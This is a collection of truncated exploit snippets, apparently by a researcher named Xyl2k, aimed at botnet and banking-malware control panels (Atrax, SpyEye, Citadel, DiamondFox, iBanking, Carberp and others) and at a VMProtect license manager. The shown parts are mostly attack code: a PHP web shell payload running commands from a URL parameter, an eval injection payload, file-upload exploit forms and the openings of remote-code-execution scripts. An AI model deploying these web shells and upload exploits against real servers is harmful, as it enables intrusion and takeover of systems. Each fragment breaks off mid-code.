Xyl2k

import random
import string
import base64
import urllib
import urllib2
 
# <CONFIG>
payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
url     = 'http://localhost/atrax/'
# </CONFIG>

Xyl2k

<?php
	// Start with PHP CLI (php pwn.php)
	set_time_limit(0);
	
	// Adjust this :)
	define('SLEEP_TIME', '4');
	define('PAGE_TIME',  4);
	define('URL',        'http://localhost/Phase/');
	
	echo('attacking ' . URL . PHP_EOL);

Xyl2k

<!-- FileStealer v1.3 panel upload vulnerability -->
<!-- Panel hash: be19e93878130b2f57d42d4dcf5ffcf0 -->
<form method="POST" action="http://localhost/panel/up.php" enctype="multipart/form-data">
        File: <input type="file" name="file" />                                         <br />
        HWID: <input type="text" name="hwid" value="COOFEEBABE" />                      <br />
        Hash: <input type="text" name="hash" value="2c471313f06370d0866db1facb34668e" /><br />
        PC:   <input type="text" name="pc"   value="ANDROMAQUE" />                      <br />
        <input type="hidden" name="step" value="1337" />
        <input type="submit" value="Pwn" />
</form>

Xyl2k

<?php
    /**
     *  Product : SpyEye Form Grabber
     *  Type    : SQL Injection
     *  File    : mod_savecert.php
     *  Cybercrime-tracker.net, 2013!
     */
?>

<html>

Xyl2k

<!DOCTYPE html>
<html>
	<head>
		<title>Gorynych v4.2.0.257- File Upload Vulnerability</title>
		<!-- Panel.zip hash: e698cf7cc57b20c02fce6de83299b75b -->
	</head>
	<body>
		<h1>&#9673; Gorynych/DiamondFox v4.2.0.257 - File Upload Vulnerability &#9673;</h1>
		<form action="http://localhost/Panel/post.php" method="POST" enctype="multipart/form-data">
			<input type="file" name="upload1">

Xyl2k

import requests
 
# Add URL
# Set a PHP payload
# Go to http://website/config.php
 
URL     = 'http://localhost/Panel/applysettings.php'
PAYLOAD = "(isset($_GET['tapz'])) ? eval($_GET['tapz']) : '"
 
data = {

Xyl2k

<!-- iBanking panel upload vulnerability -->
<!-- get.php?p=..&i=.&f=dbconfig.php -->
<form method="POST" action="http://localhost/smsbot/sendFile.php" enctype="multipart/form-data">
FiLEZ: <input type="file" name="uploadedfile" /><br />
<input type="hidden" name="bot_id" value="500" />
<input type="hidden" name="imei" value="000000000000000" />
<input type="submit" value="Pwn" />
</form>

Xyl2k

import urllib
import urllib2
 
# Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability
# Work only on windows box
 
def request(url, params=None, method='GET'):
        if method == 'POST':
                urllib2.urlopen(url, urllib.urlencode(params)).read()
        elif method == 'GET':

Xyl2k

<?php
/**
VMProtect Web License Manager 2.2.1 Multiple vulnerabilities
------------------------------------------------------------
                Vendor site: http://vmpsoft.com/
 
                First contact............: 11/09/2013
                Vendor answer............: 12/09/2013
                Vendor fixed the RFI/XSS.: 08/11/2013
                Second contact for SQL...: 25/11/2013

Xyl2k

<table width="607" border="0">
<tr>
<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
<label for="carberp">Domain: </label>
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
<input type="submit" name="button" id="button" value="Ownz !" />
</form></td>
</tr>
<tr>
<td><?php